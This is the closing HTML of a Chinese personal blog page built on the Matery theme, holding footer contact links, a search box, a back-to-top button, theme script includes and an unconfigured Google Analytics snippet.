    <a href="https://github.com" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fa fa-github"></i>
    </a>



    <a href="mailto:2503963481@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fa fa-envelope-open"></i>
    </a>



    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=2503963481&website=www.oicqzone.com" class="tooltipped" data-tooltip="QQ联系我: 2503963481" data-position="top" data-delay="50">
        <i class="fa fa-qq"></i>
    </a>



    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fa fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


<!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fa fa-search"></i>&nbsp;&nbsp;Search</span>
            <input type="search" id="searchInput" name="s" placeholder="Please enter a search keyword" class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script src="/js/search.js"></script>
<script type="text/javascript">
$(function () {
    searchFunc("/" + "search.xml", 'searchInput', 'searchResult');
});
</script>
<!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fa fa-angle-up"></i>
    </a>
</div>


<script src="/libs/materialize/materialize.min.js"></script>
<script src="/libs/masonry/masonry.pkgd.min.js"></script>
<script src="/libs/aos/aos.js"></script>
<script src="/libs/scrollprogress/scrollProgress.min.js"></script>
<script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
<script src="/js/matery.js"></script>

<!-- Global site tag (gtag.js) - Google Analytics -->

<script async src="https://www.googletagmanager.com/gtag/js?id="></script>
<script>
    window.dataLayer = window.dataLayer || [];
    function gtag() {
        dataLayer.push(arguments);
    }

    gtag('js', new Date());
    gtag('config', '');
</script>




    <script async src="/libs/others/busuanzi.pure.mini.js"></script>


</body>
</html>